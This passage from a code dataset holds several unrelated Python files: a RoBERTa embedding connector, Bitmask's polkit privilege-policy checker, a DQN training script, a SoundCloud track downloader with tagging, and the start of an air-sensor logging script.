final_tokens_tensor = torch.cat((final_tokens_tensor,tokens_tensor), dim=0)\n final_segments_tensor = torch.cat((final_segments_tensor,segments_tensor), dim=0)\n final_attention_mask = torch.cat((final_attention_mask,attention_tensor), dim=0)\n # print(final_tokens_tensor)\n # print(final_segments_tensor)\n # print(final_attention_mask)\n # print(final_tokens_tensor.shape)\n # print(final_segments_tensor.shape)\n # print(final_attention_mask.shape)\n return final_tokens_tensor, final_segments_tensor, final_attention_mask, masked_indices_list, tokenized_text_list\n\n def get_contextual_embeddings_with_mask_indices(self, sentences_list, try_cuda=True):\n # TBA\n if not sentences_list:\n return None\n if try_cuda:\n self.try_cuda()\n\n tensor_list = []\n masked_indices_list = []\n max_len = 0\n output_tokens_list = []\n for masked_inputs_list in sentences_list:\n\n tokens_list = []\n\n for idx, masked_input in enumerate(masked_inputs_list):\n\n # 2. sobstitute [MASK] with \n masked_input = masked_input.replace(MASK, ROBERTA_MASK)\n\n text_spans = masked_input.split(ROBERTA_MASK)\n text_spans_bpe = (\n (\" {0} \".format(ROBERTA_MASK))\n .join(\n [\n self.bpe.encode(text_span.rstrip())\n for text_span in text_spans\n ]\n )\n .strip()\n )\n\n prefix = \"\"\n if idx == 0:\n prefix = ROBERTA_START_SENTENCE\n\n tokens_list.append(\n self.task.source_dictionary.encode_line(\n prefix + \" \" + text_spans_bpe, append_eos=True\n )\n )\n\n tokens = torch.cat(tokens_list)[: self.max_sentence_length]\n output_tokens_list.append(tokens.long().cpu().numpy())\n\n if len(tokens) > max_len:\n max_len = len(tokens)\n tensor_list.append(tokens)\n masked_index = (tokens == self.task.mask_idx).nonzero().numpy()\n for x in masked_index:\n masked_indices_list.append([x[0]])\n\n pad_id = self.task.source_dictionary.pad()\n tokens_list = []\n for tokens in tensor_list:\n pad_lenght = max_len - len(tokens)\n if pad_lenght > 0:\n pad_tensor = torch.full([pad_lenght], pad_id, dtype=torch.int)\n tokens = torch.cat((tokens, pad_tensor))\n tokens_list.append(tokens)\n\n batch_tokens = torch.stack(tokens_list)\n\n with torch.no_grad():\n # with utils.eval(self.model.model):\n self.model.eval()\n self.model.model.eval()\n log_probs, extra = self.model.model(\n batch_tokens.long().to(device=self._model_device),\n features_only=True,\n return_all_hiddens=False,\n )\n\n # return log_probs.cpu(), output_tokens_list, masked_indices_list\n return [log_probs.cpu()], None, None, masked_indices_list\n # self.get_batch_generation(sentences_list)\n\n # # assume in input 1 or 2 sentences - in general, it considers only the first 2 sentences\n # if not sentences_list:\n # return None\n # if try_cuda:\n # self.try_cuda()\n\n # tokens_tensor, segments_tensor, attention_mask_tensor, masked_indices_list, tokenized_text_list = self.__get_input_tensors_batch(sentences_list)\n\n # with torch.no_grad():\n # all_encoder_layers, _ = self.bert_model(\n # tokens_tensor.to(self._model_device),\n # segments_tensor.to(self._model_device))\n\n # all_encoder_layers = [layer.cpu() for layer in all_encoder_layers]\n\n # sentence_lengths = [len(x) for x in tokenized_text_list]\n\n # # all_encoder_layers: a list of the full sequences of encoded-hidden-states at the end\n # # of each attention block (i.e. 12 full sequences for BERT-base, 24 for BERT-large), each\n # # encoded-hidden-state is a torch.FloatTensor of size [batch_size, sequence_length, hidden_size]\n # return all_encoder_layers, sentence_lengths, tokenized_text_list\n\n # # return None\n","repo_name":"Chandrahasd/OKGIT","sub_path":"src/lama/modules/roberta_connector.py","file_name":"roberta_connector.py","file_ext":"py","file_size_in_byte":13960,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"18048399993","text":"import commands\nimport os\nimport subprocess\nimport platform\nimport time\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom leap.bitmask.config import flags\nfrom leap.bitmask.logs.utils import get_logger\nfrom leap.common.check import leap_assert\nfrom leap.common.files import which\n\nlogger = get_logger()\n\n\nclass NoPolkitAuthAgentAvailable(Exception):\n pass\n\n\nclass NoPkexecAvailable(Exception):\n pass\n\n\ndef is_missing_policy_permissions():\n \"\"\"\n Returns True if we do not have implemented a policy checker for this\n platform, or if the policy checker exists but it cannot find the\n appropriate policy mechanisms in place.\n\n :rtype: bool\n \"\"\"\n _system = platform.system()\n platform_checker = _system + \"PolicyChecker\"\n policy_checker = globals().get(platform_checker, None)\n if not policy_checker:\n # it is true that we miss permission to escalate\n # privileges without asking for password each time.\n logger.debug(\"we could not find a policy checker implementation \"\n \"for %s\" % (_system,))\n return True\n return policy_checker().is_missing_policy_permissions()\n\n\nclass PolicyChecker:\n \"\"\"\n Abstract PolicyChecker class\n \"\"\"\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def is_missing_policy_permissions(self):\n \"\"\"\n Returns True if we could not find any policy mechanisms that\n are defined to be in used for this particular platform.\n\n :rtype: bool\n \"\"\"\n return True\n\n\nclass LinuxPolicyChecker(PolicyChecker):\n \"\"\"\n PolicyChecker for Linux\n \"\"\"\n LINUX_POLKIT_FILE = (\"/usr/share/polkit-1/actions/\"\n \"se.leap.bitmask.policy\")\n LINUX_POLKIT_FILE_BUNDLE = (\"/usr/share/polkit-1/actions/\"\n \"se.leap.bitmask.bundle.policy\")\n PKEXEC_BIN = 'pkexec'\n\n @classmethod\n def get_polkit_path(self):\n \"\"\"\n Returns the polkit file path.\n\n :rtype: str\n \"\"\"\n return (self.LINUX_POLKIT_FILE_BUNDLE if flags.STANDALONE\n else self.LINUX_POLKIT_FILE)\n\n def is_missing_policy_permissions(self):\n # FIXME this name is quite confusing, it does not have anything to do\n # with file permissions.\n \"\"\"\n Returns True if we could not find the appropriate policykit file\n in place\n\n :rtype: bool\n \"\"\"\n path = self.get_polkit_path()\n return not os.path.isfile(path)\n\n @classmethod\n def maybe_pkexec(self):\n \"\"\"\n Checks whether pkexec is available in the system, and\n returns the path if found.\n\n Might raise:\n NoPkexecAvailable,\n NoPolkitAuthAgentAvailable.\n\n :returns: a list of the paths where pkexec is to be found\n :rtype: list\n \"\"\"\n if self._is_pkexec_in_system():\n if not self.is_up():\n self.launch()\n time.sleep(2)\n if self.is_up():\n pkexec_possibilities = which(self.PKEXEC_BIN)\n leap_assert(len(pkexec_possibilities) > 0,\n \"We couldn't find pkexec\")\n return pkexec_possibilities\n else:\n logger.warning(\"No polkit auth agent found. pkexec \" +\n \"will use its own auth agent.\")\n raise NoPolkitAuthAgentAvailable()\n else:\n logger.warning(\"System has no pkexec\")\n raise NoPkexecAvailable()\n\n @classmethod\n def launch(self):\n \"\"\"\n Tries to launch policykit\n \"\"\"\n env = None\n if flags.STANDALONE:\n # This allows us to send to subprocess the environment configs that\n # works for the standalone bundle (like the PYTHONPATH)\n env = dict(os.environ)\n # The LD_LIBRARY_PATH is set on the launcher but not forwarded to\n # subprocess unless we do so explicitly.\n env[\"LD_LIBRARY_PATH\"] = os.path.abspath(\"./lib/\")\n try:\n # We need to quote the command because subprocess call\n # will do \"sh -c 'foo'\", so if we do not quoute it we'll end\n # up with a invocation to the python interpreter. And that\n # is bad.\n logger.debug(\"Trying to launch polkit agent\")\n subprocess.call([\"python -m leap.bitmask.util.polkit_agent\"],\n shell=True, env=env)\n except Exception as exc:\n logger.exception(exc)\n\n @classmethod\n def is_up(self):\n \"\"\"\n Checks if a polkit daemon is running.\n\n :return: True if it's running, False if it's not.\n :rtype: boolean\n \"\"\"\n # Note that gnome-shell does not uses a separate process for the\n # polkit-agent, it uses a polkit-agent within its own process so we\n # can't ps-grep a polkit process, we can ps-grep gnome-shell itself.\n\n # the [x] thing is to avoid grep match itself\n polkit_options = [\n 'ps aux | grep \"polkit-[g]nome-authentication-agent-1\"',\n 'ps aux | grep \"polkit-[k]de-authentication-agent-1\"',\n 'ps aux | grep \"polkit-[m]ate-authentication-agent-1\"',\n 'ps aux | grep \"[l]xpolkit\"',\n 'ps aux | grep \"[l]xsession\"',\n 'ps aux | grep \"[g]nome-shell\"',\n 'ps aux | grep \"[f]ingerprint-polkit-agent\"',\n 'ps aux | grep \"[x]fce-polkit\"',\n ]\n is_running = [commands.getoutput(cmd) for cmd in polkit_options]\n\n return any(is_running)\n\n @classmethod\n def _is_pkexec_in_system(self):\n \"\"\"\n Checks the existence of the pkexec binary in system.\n \"\"\"\n pkexec_path = which('pkexec')\n if len(pkexec_path) == 0:\n return False\n return True\n","repo_name":"leapcode/bitmask_client","sub_path":"src/leap/bitmask/util/privilege_policies.py","file_name":"privilege_policies.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"40"} +{"seq_id":"1296675161","text":"from fileinput import filename\nfrom unicodedata import name\nimport gym\nfrom network import Agent\nimport numpy as np\nimport sys\nfrom utils import plot_learning_curve\n\nif __name__ == '__main__':\n env_name = \"LunarLander-v2\" if sys.argv[-1] == \"lunar\" else \"CartPole-v0\"\n\n print(\"Environment {}\".format(env_name))\n \n env = gym.make(env_name)\n agent = Agent(gamma=0.99, epsilon=1.0, batch_size=64, n_actions=env.action_space.n, eps_end=0.01, input_dims=[env.observation_space.shape[0]], lr=0.003, name=env_name)\n scores, eps_history = [],[]\n n_games = 500\n \n best_score = 0\n for i in range(n_games):\n score = 0\n done = False\n observation = env.reset()\n\n while not done:\n action = agent.choose_action(observation)\n observation_, reward, done, info = env.step(action)\n score += reward\n agent.store_transition(observation, action, reward, observation_, done)\n\n agent.learn()\n observation = observation_\n \n scores.append(score)\n eps_history.append(agent.epsilon)\n\n avg_score = np.mean(scores[-100:])\n if avg_score > best_score:\n # print(\"saved checkpoint\", avg_score, best_score)\n agent.save_model()\n best_score = avg_score\n\n print('episode', i, 'score %2.f' % score, 'average score %.2f' % avg_score, 'epsilon %.2f' % agent.epsilon )\n\n x = [i+1 for i in range(n_games)]\n filename = '{}.png'.format(env_name)\n plot_learning_curve(x, scores, eps_history, filename)\n","repo_name":"aungmyatv8/AI","sub_path":"DQN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17414835046","text":"import os\r\nimport re\r\nimport sys\r\nimport json\r\nimport base64\r\nimport argparse\r\nimport platform\r\nimport traceback\r\nimport subprocess\r\n\r\nimport m3u8\r\nimport mutagen\r\nimport requests\r\nfrom tqdm import tqdm\r\nfrom mutagen import id3\r\nfrom mutagen.flac import Picture\r\nfrom mutagen.oggopus import OggOpus\r\nfrom mutagen.mp4 import MP4, MP4Cover\r\nfrom mutagen.id3 import ID3NoHeaderError\r\n\r\nfrom api import client\r\n\r\n\r\ndef err(msg):\r\n\tprint(msg)\r\n\ttraceback.print_exc()\r\n\r\ndef parse_cfg():\r\n\twith open('config.json', encoding='UTF-8') as f:\r\n\t\treturn json.load(f)\r\n\r\ndef parse_cookies():\r\n\tparsed = {}\r\n\twith open('cookies.txt', encoding='UTF-8') as f:\r\n\t\tlines = f.readlines()\r\n\tfor line in lines:\r\n\t\tif line.startswith('#'):\r\n\t\t\tcontinue\r\n\t\tsplit_line = line.split('\\t')\r\n\t\tparsed[split_line[-2]] = split_line[-1].rstrip('\\n').replace('&', '&').replace('"', '\"')\r\n\treturn parsed\r\n\r\ndef dir_setup(path):\r\n\tif not os.path.isdir(path):\r\n\t\tos.makedirs(path)\r\n\r\ndef read_txt(path):\r\n\twith open(path) as f:\r\n\t\treturn [u.strip() for u in f.readlines() if u.strip()]\r\n\r\ndef process_urls(urls):\r\n\tprocessed = []\r\n\tfix = lambda x: x.split('#')[0]\r\n\tfor url in urls:\r\n\t\tif url.endswith('.txt'):\r\n\t\t\tfor txt_url in read_txt(url):\r\n\t\t\t\tif txt_url not in processed:\r\n\t\t\t\t\tprocessed.append(fix(txt_url))\r\n\t\telse:\r\n\t\t\tif url not in processed:\r\n\t\t\t\tprocessed.append(fix(url))\r\n\treturn processed\r\n\r\ndef parse_prefs():\r\n\tcfg = parse_cfg()\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\r\n\t\t'-u', '--urls', \r\n\t\tnargs='+', required=True,\r\n\t\thelp='Multiple links or text file filenames / paths.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-q', '--quality',\r\n\t\tchoices=[1, 2, 3, 4], default=cfg['quality'], type=int,\r\n\t\thelp='1: 64kbps Opus, 2: 128 Kbps MP3, 3: 256 Kbps AAC, 4: best/download.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-o', '--output-path',\r\n\t\tdefault=cfg['output_path'],\r\n\t\thelp='Output path. Double up backslashes or use single '\r\n\t\t\t 'forward slashes for Windows.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-t', '--template',\r\n\t\tdefault=cfg['fname_template'],\r\n\t\thelp='Naming template for track filenames.'\r\n\t)\r\n\tparser.add_argument(\r\n\t\t'-k', '--keep-cover', \r\n\t\taction='store_true', default=cfg['keep_cover'],\r\n\t\thelp='Keep cover in album folder.'\r\n\t)\r\n\targs = vars(parser.parse_args())\r\n\tcfg.update(args)\r\n\tcfg['urls'] = process_urls(cfg['urls'])\r\n\treturn cfg\r\n\r\ndef check_url(url):\r\n\tmedia_types = [\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/sets/[\\w-]+$', 'set'),\r\n\t\t(r'^https://soundcloud.com/you/likes$', 'likes'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/albums$', 'albums'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/tracks$', 'tracks'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/[\\w-]+$', 'track'),\r\n\t\t(r'^https://soundcloud.com/[\\w-]+/[\\w-]+\\?in=[\\w-]+/sets/[\\w-]+$', 'track')\r\n\t]\r\n\tfor media_type in media_types:\r\n\t\tif re.match(media_type[0], url) != None:\r\n\t\t\treturn media_type[1]\r\n\r\ndef sanitize(fname):\r\n\tif is_win:\r\n\t\treturn re.sub(r'[\\/:*?\"><|]', '_', fname)\r\n\telse:\r\n\t\treturn re.sub('/', '_', fname)\t\t\t\r\n\r\ndef parse_template(meta, unparsed, default):\r\n\ttry:\r\n\t\tparsed = unparsed.format(**meta)\r\n\texcept KeyError:\r\n\t\tprint('Failed to parse template. Default one will be used instead.')\r\n\t\tparsed = default.format(**meta)\r\n\treturn sanitize(parsed)\r\n\r\ndef parse_meta(src, meta=None, num=None, total=None, url=None):\r\n\tif meta != None:\r\n\t\tyear = src.get('release_date')\r\n\t\tif year != None:\r\n\t\t\tyear = year.split('-')[0]\r\n\t\tmeta['artist'] = src['user']['username']\r\n\t\tmeta['title'] =\t src.get('title')\r\n\t\tmeta['tracknumber'] = num\r\n\t\tmeta['trackpadded'] = str(num).zfill(len(str(meta['tracktotal'])))\r\n\t\tmeta['year'] = year\r\n\t\tif src.get('publisher_metadata') != None:\r\n\t\t\tmeta['isrc'] = src['publisher_metadata'].get('isrc')\r\n\t\t\tmeta['upc'] = src['publisher_metadata'].get('upc_or_ean')\r\n\t\t\tmeta['artist'] = src['publisher_metadata'].get('artist')\r\n\telse:\r\n\t\tmeta = {\r\n\t\t\t'album': src['title'],\r\n\t\t\t'albumartist': src['user']['username'], \r\n\t\t\t'comment': src['permalink_url'],\r\n\t\t\t'genre': src.get('genre'),\r\n\t\t\t'tracktotal': total\r\n\t\t}\r\n\t\tif src.get('publisher_metadata') != None:\r\n\t\t\tmeta['copyright'] = src.get('c_line')\r\n\treturn meta\r\n\r\n# mp3 always available?\r\ndef query_quals(meta):\r\n\tspecs = {\r\n\t\t'audio/ogg': ['64 Kbps OPUS', '.ogg'],\r\n\t\t'audio/mpeg': ['128 Kbps MP3', '.mp3'],\r\n\t\t'audio/mp4': ['256 Kbps AAC', '.m4a'],\r\n\t\t'download': []\r\n\t}\r\n\tfor transcode in meta['media']['transcodings']:\r\n\t\tif transcode['format']['protocol'] == 'hls':\r\n\t\t\tmime_key = transcode['format']['mime_type'].split(';')[0]\r\n\t\t\tspecs[mime_key].append(transcode['url'])\r\n\twant = cfg['quality']\r\n\tif want == 4:\r\n\t\tif meta['downloadable'] == True and meta['has_downloads_left'] == True:\r\n\t\t\tkey = 'download'\r\n\t\t\tspecs[key].extend(client.get_file(specs[key][0]))\t\t\t\r\n\t\telif len(specs['audio/mp4']) == 3:\r\n\t\t\tkey = 'audio/mp4'\r\n\t\telse:\r\n\t\t\tkey = 'audio/mpeg'\r\n\telif want == 3:\r\n\t\tif len(specs['audio/mp4']) == 3:\r\n\t\t\tkey = 'audio/mp4'\r\n\t\telse:\r\n\t\t\tkey = 'audio/mpeg'\r\n\telif want == 2:\r\n\t\tkey = 'audio/mpeg'\r\n\telif want == 1:\t\r\n\t\tif len(specs['audio/ogg']) == 3:\r\n\t\t\tkey = 'audio/ogg'\r\n\t\telse:\r\n\t\t\traise Exception('Unavailable in OPUS.')\r\n\treturn specs[key]\r\n\r\ndef download_seg(url, path):\r\n\tsegments = []\r\n\tmanifest = client.get_manifest(url)\r\n\tparsed = m3u8.loads(manifest)\r\n\tif parsed.segment_map != None:\r\n\t\tsegments = [parsed.segment_map['uri']]\r\n\tsegments.extend(x.uri for x in parsed.segments)\r\n\tout_path = os.path.join('sc-dl_tmp', 'tmp.mp4')\r\n\twith tqdm(total=len(segments), \r\n\t\tbar_format='{l_bar}{bar}{n_fmt}/{total_fmt} segments [{elapsed}<{remaining}]') as bar:\r\n\t\t\t\t \r\n\t\twith open(out_path, 'wb') as f:\r\n\t\t\tfor url in segments:\r\n\t\t\t\tr = requests.get(url, headers={'Range': 'bytes=0-'}, stream=True)\r\n\t\t\t\tr.raise_for_status()\r\n\t\t\t\tfor chunk in r.iter_content(32*1024):\r\n\t\t\t\t\tif chunk:\r\n\t\t\t\t\t\tf.write(chunk)\r\n\t\t\t\tbar.update(1)\r\n\tsubprocess.run(['ffmpeg', '-loglevel', 'error', '-y', '-i', out_path, '-c:a', 'copy', path])\r\n\r\ndef download(url, path):\r\n\tout_path = os.path.join('sc-dl_tmp', 'tmp.mp4')\r\n\tr = requests.get(url, headers={'Range': 'bytes=0-'}, stream=True)\r\n\tr.raise_for_status()\r\n\twith tqdm(total=int(r.headers['Content-Length']), unit='B', unit_scale=True,\r\n\t\tunit_divisor=1024) as bar:\r\n\t\twith open(out_path, 'wb') as f:\r\n\t\t\tfor chunk in r.iter_content(32*1024):\r\n\t\t\t\tif chunk:\r\n\t\t\t\t\tf.write(chunk)\r\n\t\t\t\t\tbar.update(len(chunk))\r\n\r\ndef write_tags(meta, path, ext, cov_path):\r\n\tif cov_path != None:\r\n\t\twith open(cov_path, 'rb') as f:\r\n\t\t\tcov_data = f.read()\r\n\tif ext == '.m4a':\r\n\t\tt = [\r\n\t\t\t('\\xa9alb', 'album'),\r\n\t\t\t('aART', 'albumartist'),\r\n\t\t\t('\\xa9ART', 'artist'),\r\n\t\t\t('\\xa9cmt', 'comment'),\r\n\t\t\t('\\xa9gen', 'genre'),\r\n\t\t\t('\\xa9nam', 'title'),\r\n\t\t\t('\\xa9day', 'year')\r\n\t\t]\r\n\t\taudio = MP4(path)\r\n\t\taudio.delete()\r\n\t\tfor frame, key in t:\r\n\t\t\tif meta.get(key):\r\n\t\t\t\taudio[frame] = meta[key]\r\n\t\taudio['trkn'] = [(meta['tracknumber'], meta['tracktotal'])]\r\n\t\tif cov_path != None:\r\n\t\t\taudio['covr'] = [MP4Cover(cov_data, imageformat=MP4Cover.FORMAT_JPEG)]\r\n\tif ext == '.mp3':\r\n\t\ttry: \r\n\t\t\taudio = id3.ID3(path)\r\n\t\texcept ID3NoHeaderError:\r\n\t\t\taudio = id3.ID3()\r\n\t\taudio['TRCK'] = id3.TRCK(\r\n\t\t\tencoding=3, text=\"{}/{}\".format(meta['tracknumber'], meta['tracktotal'])\r\n\t\t)\r\n\t\tlegend={\r\n\t\t\t'album': id3.TALB,\r\n\t\t\t'albumartist': id3.TPE2,\r\n\t\t\t'artist': id3.TPE1,\r\n\t\t\t'comment': id3.COMM,\r\n\t\t\t'copyright': id3.TCOP,\r\n\t\t\t'isrc': id3.TSRC,\r\n\t\t\t'label': id3.TPUB,\r\n\t\t\t'title': id3.TIT2,\r\n\t\t\t'year': id3.TYER\r\n\t\t}\r\n\t\tfor k, v in meta.items():\r\n\t\t\tid3tag = legend.get(k)\r\n\t\t\tif v and id3tag:\r\n\t\t\t\taudio[id3tag.__name__] = id3tag(encoding=3, text=v)\r\n\t\tif cov_path != None:\r\n\t\t\taudio.add(id3.APIC(3, 'image/jpeg', 3, None, cov_data))\r\n\telif ext == '.ogg':\r\n\t\taudio = OggOpus(path)\r\n\t\tdel meta['trackpadded']\r\n\t\tfor k, v in meta.items():\r\n\t\t\tif v:\r\n\t\t\t\taudio.tags[k] = str(v)\r\n\t\tif cov_path != None:\r\n\t\t\tpicture = Picture()\r\n\t\t\tpicture.data = cov_data\r\n\t\t\tpicture.type = 17\r\n\t\t\tpicture.mime = u'image/jpeg'\r\n\t\t\tpicture.width = 500\r\n\t\t\tpicture.height = 500\r\n\t\t\tpicture.depth = 16\r\n\t\t\tpicture_data = picture.write()\r\n\t\t\tencoded_data = base64.b64encode(picture_data)\r\n\t\t\tvcomment_value = encoded_data.decode('ascii')\r\n\t\t\taudio['metadata_block_picture'] = [vcomment_value]\r\n\taudio.save(path)\r\n\r\ndef write_cover(path, url):\r\n\tcov_path = os.path.join(path, 'cover.jpg')\r\n\turl = url[:-9] + 't500x500.jpg'\r\n\tr = requests.get(url)\r\n\tr.raise_for_status()\r\n\twith open(cov_path, 'wb') as f:\r\n\t\tf.write(r.content)\r\n\treturn cov_path\r\n\r\ndef is_downloadable(track):\r\n\tif track['streamable'] == False:\r\n\t\tprint('Track is not streamable.')\r\n\t\treturn False\r\n\telif track['monetization_model'] == 'SUB_HIGH_TIER' and is_go_plus == False:\r\n\t\tprint('Track requires an active Go+ subscription.')\r\n\t\treturn False\r\n\telif track['policy'] == 'BLOCK':\r\n\t\tprint('Track unavailable in your region.')\r\n\t\treturn False\r\n\treturn True\r\n\r\ndef get_additional_meta(_url):\r\n\tsplit = _url.split('?in=')\r\n\turl = 'https://soundcloud.com/' + split[-1]\r\n\tmeta = client.get_metadata(url)['tracks']\r\n\ttotal = len(meta)\r\n\tfor num, _track in enumerate(meta, 1):\r\n\t\tif _track.get('permalink_url') == split[0]:\r\n\t\t\treturn num, total\t\r\n\r\ndef iter_track(meta, path, parsed_meta, num_oride=-1):\r\n\tcov_path = None\r\n\tout_path = os.path.join('sc-dl_tmp', 'tmp.mp4')\r\n\ttotal = len(meta)\r\n\tfor num, track in enumerate(meta, 1):\r\n\t\tif is_downloadable(track) == False:\r\n\t\t\tcontinue\r\n\t\tif num_oride != -1:\r\n\t\t\tparsed_meta = parse_meta(track, meta=parsed_meta, num=num_oride)\r\n\t\telse:\r\n\t\t\tparsed_meta = parse_meta(track, meta=parsed_meta, num=num)\r\n\t\tspecs = query_quals(track)\r\n\t\tis_dload = specs[2].startswith('https://c')\r\n\t\tif num == 1 and is_dload == False:\r\n\t\t\ttry:\r\n\t\t\t\tcov_path = write_cover(path, meta[0]['artwork_url'])\r\n\t\t\texcept Exception:\r\n\t\t\t\tprint('Failed to write cover.')\r\n\t\ttemplate = parse_template(parsed_meta, cfg['template'], '{trackpadded}. {title}')\r\n\t\tffmpeg_out_path = os.path.join(path, str(num)) + specs[1]\r\n\t\tpost_path = os.path.join(path, template) + specs[1]\r\n\t\tif os.path.isfile(post_path):\r\n\t\t\tprint('Track already exists locally.')\r\n\t\t\tcontinue\t\r\n\t\tif is_dload == True:\r\n\t\t\tprint('Downloading track {} of {}: {} - {} (download button)'.format(num, total, parsed_meta['title'], specs[0]))\r\n\t\t\tdownload(specs[2], ffmpeg_out_path)\r\n\t\telse:\r\n\t\t\tprint('Downloading track {} of {}: {} - {}'.format(num, total, parsed_meta['title'], specs[0]))\r\n\t\t\tdownload_seg(specs[2], ffmpeg_out_path)\r\n\t\t\twrite_tags(parsed_meta, ffmpeg_out_path, specs[1], cov_path)\r\n\t\ttry:\r\n\t\t\tos.rename(ffmpeg_out_path, post_path)\r\n\t\texcept Exception:\r\n\t\t\tprint('Failed to rename track.')\r\n\tif cov_path != None and cfg['keep_cover'] == False:\r\n\t\tos.remove(cov_path)\r\n\r\ndef set(meta, _, path=None):\r\n\tparsed_meta = parse_meta(meta, total=len(meta['tracks']))\r\n\ttemplate = parse_template(parsed_meta, \r\n\t\tcfg['media_types']['set']['folder_template'], '{albumartist} - {album}')\r\n\talbum_folder = \"{} - {}\".format(parsed_meta['albumartist'], parsed_meta['album'])\r\n\tif path != None:\r\n\t\talbum_path = os.path.join(path, template)\r\n\telse:\r\n\t\talbum_path = os.path.join(cfg['output_path'], template)\r\n\tdir_setup(album_path)\r\n\tprint(album_folder)\r\n\titer_track(meta['tracks'], album_path, parsed_meta)\r\n\r\ndef track(meta, url, path=None, num=1, total=1):\r\n\tif '?in=' in url:\r\n\t\tnum, total = get_additional_meta(url)\r\n\tparsed_meta = parse_meta(meta, total=total)\r\n\ttemplate = parse_template(parsed_meta, \r\n\t\tcfg['media_types']['track']['folder_template'], '{albumartist} - {album}')\r\n\ttrack_folder = \"{} - {}\".format(parsed_meta['albumartist'], meta['title'])\r\n\tif path != None:\r\n\t\ttrack_path = os.path.join(path, template)\r\n\telse:\r\n\t\ttrack_path = os.path.join(cfg['output_path'], template)\r\n\tprint(track_folder)\r\n\tdir_setup(track_path)\r\n\titer_track([meta], track_path, parsed_meta, num_oride=num)\r\n\r\ndef albums(artist_meta, _):\r\n\ttotal = 0\r\n\ttemplate = parse_template(artist_meta, \r\n\t\tcfg['media_types']['artist_albums']['folder_template'], '{username}')\t\r\n\tartist_path = os.path.join(cfg['output_path'], template)\r\n\tprint(artist_meta['username'] + '\\'s albums')\r\n\tdir_setup(artist_path)\r\n\talbums = client.get_artist_albums(str(artist_meta['id']))\r\n\tfor _album in albums:\r\n\t\ttotal += len(_album)\r\n\tif total == 0:\r\n\t\traise Exception('Artist does not have any albums.')\r\n\tfor _album in albums:\r\n\t\tfor num, album in enumerate(_album, 1):\r\n\t\t\tprint('\\nAlbum {} of {}:'.format(num, total))\r\n\t\t\tset(album[0], path=artist_path)\r\n\r\ndef likes(likes, _):\r\n\ttotal = 0\r\n\tfolder_name = cfg['media_types']['user_likes']['folder_name']\r\n\tlikes_path = os.path.join(\r\n\t\tcfg['output_path'], folder_name)\r\n\tprint('Likes')\r\n\tdir_setup(likes_path)\r\n\tfor like in likes:\r\n\t\ttotal += len(like)\r\n\tif total == 0:\r\n\t\traise Exception('You do not have any likes.')\r\n\tfor like in likes:\r\n\t\tfor num, _track in enumerate(like, 1):\r\n\t\t\tprint('\\nTrack {} of {}:'.format(num, total))\r\n\t\t\ttrack(_track['track'], _, path=likes_path, total=total)\r\n\r\ndef tracks(artist_meta, _):\r\n\ttotal = 0\r\n\ttemplate = parse_template(artist_meta, \r\n\t\tcfg['media_types']['artist_albums']['folder_template'], '{username}')\t\r\n\ttracks_path = os.path.join(cfg['output_path'], template)\r\n\tprint(artist_meta['username'] + '\\'s tracks')\r\n\tdir_setup(tracks_path)\r\n\t_tracks = client.get_artist_tracks(str(artist_meta['id']))\r\n\tfor _track in _tracks:\r\n\t\ttotal += len(_track)\r\n\tif total == 0:\r\n\t\traise Exception('Artist does not have any tracks.')\r\n\tfor _track in _tracks:\r\n\t\tfor num, _track in enumerate(_track, 1):\r\n\t\t\tprint('\\nTrack {} of {}:'.format(num, total))\r\n\t\t\ttrack(_track, _, path=tracks_path, num=num, total=total)\r\n\r\ndef main(url, media_type):\r\n\tif media_type in ('albums', 'tracks'):\r\n\t\tmeta = client.get_artist_info(url)\r\n\telif media_type == 'likes':\r\n\t\tmeta = client.get_user_likes()\t\r\n\telse:\r\n\t\tmeta = client.get_metadata(url)\r\n\tglobals()[media_type](meta, url)\r\n\r\ndef cleanup():\r\n\tfor fname in os.listdir('sc-dl_tmp'):\r\n\t\tos.remove(os.path.join('sc-dl_tmp', fname))\r\n\r\nif __name__ == '__main__':\r\n\tis_win = platform.system() == 'Windows'\r\n\ttry:\r\n\t\tif hasattr(sys, 'frozen'):\r\n\t\t\tos.chdir(os.path.dirname(sys.executable))\r\n\t\telse:\r\n\t\t\tos.chdir(os.path.dirname(__file__))\r\n\texcept OSError:\r\n\t\tpass\r\n\tprint('''\r\n _____ _____ ____ __ \r\n| __| |___| \\| | \r\n|__ | --|___| | | |__ \r\n|_____|_____| |____/|_____|\r\n\t''')\r\n\tcfg = parse_prefs()\r\n\tdir_setup('sc-dl_tmp')\r\n\tparsed = parse_cookies()\r\n\tclient = client.Client(parsed)\r\n\tplan = client.get_plan()\r\n\tis_go_plus = plan == 'Go+'\r\n\tprint('Signed in successfully - {} account.'.format(plan))\r\n\ttotal = len(cfg['urls'])\r\n\tfor num, url in enumerate(cfg['urls'], 1):\r\n\t\tprint('\\nItem {} of {}:'.format(num, total))\r\n\t\tmedia_type = check_url(url)\r\n\t\tif media_type == None:\r\n\t\t\tprint('Invalid URL:', url)\r\n\t\t\tcontinue\r\n\t\ttry:\r\n\t\t\tmain(url, media_type)\r\n\t\texcept KeyboardInterrupt:\r\n\t\t\tsys.exit()\r\n\t\texcept Exception:\r\n\t\t\terr('Item failed.')\r\n\t\tfinally:\r\n\t\t\tcleanup()","repo_name":"Sorrow446/SC-DL","sub_path":"sc-dl.py","file_name":"sc-dl.py","file_ext":"py","file_size_in_byte":14776,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"9554396718","text":"#!/usr/bin/env python3\n\nfrom time import sleep\nfrom datetime import datetime\nimport os\nfrom bme280 import BME280\nfrom ccs811 import CCS811\n\nCSV_FILENAME = './dump_data.csv'\n\nccs811 = CCS811()\nbme280 = BME280()\np, t, h = 